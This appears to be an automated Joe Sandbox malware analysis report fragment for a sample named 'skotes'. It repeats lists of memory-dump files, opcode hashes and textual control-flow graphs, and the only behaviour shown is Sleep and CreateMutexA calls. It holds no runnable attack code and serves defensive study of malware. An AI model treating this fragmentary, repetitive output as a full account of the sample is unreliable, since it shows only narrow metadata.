                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 33ac14c72989e3b033b68f31ee56ec875b06ef20056e9a943f97b2f1105d7f79
                                                                                                                                                                                                                                                                                          • Instruction ID: 306e9476e2dac1f23a1027cf063d6bf31c10d4f6aecf0b4e485f729040996c99
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33ac14c72989e3b033b68f31ee56ec875b06ef20056e9a943f97b2f1105d7f79
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0312871B001018BEB18DB7DDD89BEDB762EB85324F24421CE054DB2D5CB798980EF16

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 202 fba682-fba6a2 206 fba6d0-fba6ec 202->206 207 fba6a4-fba6b0 202->207 210 fba71a-fba739 206->210 211 fba6ee-fba6fa 206->211 208 fba6b2-fba6c0 207->208 209 fba6c6-fba6cd call fcd663 207->209 208->209 214 fba949 208->214 209->206 212 fba73b-fba747 210->212 213 fba767-fba916 call fc80c0 210->213 216 fba6fc-fba70a 211->216 217 fba710-fba717 call fcd663 211->217 218 fba749-fba757 212->218 219 fba75d-fba764 call fcd663 212->219 222 fba94e 214->222 223 fba949 call fe6c6a 214->223 216->214 216->217 217->210 218->214 218->219 219->213 226 fba953-fba994 Sleep CreateMutexA 222->226 227 fba94e call fe6c6a 222->227 223->222 234 fba9a7-fba9a8 226->234 235 fba996-fba998 226->235 227->226 235->234 236 fba99a-fba9a5 235->236 236->234
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f705d3961c593f7cd758d9b4d71dac8c33d2e5f9f118a87eb94bb388c61bc2a9
                                                                                                                                                                                                                                                                                          • Instruction ID: 56f5ae7f51bd933c4f50da7984546f94d28c31b3d0450f3d58f0f23d9c8e1f2e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f705d3961c593f7cd758d9b4d71dac8c33d2e5f9f118a87eb94bb388c61bc2a9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A312671B041009BEB189B79DDC9BEDB762EB85320F24821CE014DB2D5DB798980EF56

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 238 fb9adc-fb9ae8 239 fb9aea-fb9af8 238->239 240 fb9afe-fb9b27 call fcd663 238->240 239->240 241 fba917 239->241 248 fb9b29-fb9b35 240->248 249 fb9b55-fb9b57 240->249 243 fba953-fba994 Sleep CreateMutexA 241->243 244 fba917 call fe6c6a 241->244 250 fba9a7-fba9a8 243->250 251 fba996-fba998 243->251 244->243 252 fb9b4b-fb9b52 call fcd663 248->252 253 fb9b37-fb9b45 248->253 254 fb9b59-fba916 call fc80c0 249->254 255 fb9b65-fb9d91 call fc7a00 call fb5c10 call fb8b30 call fc8220 call fc7a00 call fb5c10 call fb8b30 call fc8220 249->255 251->250 256 fba99a-fba9a5 251->256 252->249 253->241 253->252 256->250
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0c3c889ed4be2b40b70192e5194e98883ff73e1c9e786b7cb8a220c7ca99b5ee
                                                                                                                                                                                                                                                                                          • Instruction ID: 28028b465742b3029b38d728d76e59731f6f5ac41485c4e6b27e2d39b15e50ee
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c3c889ed4be2b40b70192e5194e98883ff73e1c9e786b7cb8a220c7ca99b5ee
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77216E327042019BEB18AB6DDCC9BACF761EBC1321F20421DE558DB2D5D7BA5940EF11

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 315 fba856-fba86e 316 fba89c-fba89e 315->316 317 fba870-fba87c 315->317 320 fba8a9-fba8b1 call fb7d30 316->320 321 fba8a0-fba8a7 316->321 318 fba87e-fba88c 317->318 319 fba892-fba899 call fcd663 317->319 318->319 322 fba94e 318->322 319->316 332 fba8b3-fba8bb call fb7d30 320->332 333 fba8e4-fba8e6 320->333 324 fba8eb-fba916 call fc80c0 321->324 326 fba953-fba987 Sleep CreateMutexA 322->326 327 fba94e call fe6c6a 322->327 335 fba98e-fba994 326->335 327->326 332->333 339 fba8bd-fba8c5 call fb7d30 332->339 333->324 337 fba9a7-fba9a8 335->337 338 fba996-fba998 335->338 338->337 340 fba99a-fba9a5 338->340 339->333 344 fba8c7-fba8cf call fb7d30 339->344 340->337 344->333 347 fba8d1-fba8d9 call fb7d30 344->347 347->333 350 fba8db-fba8e2 347->350 350->324
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
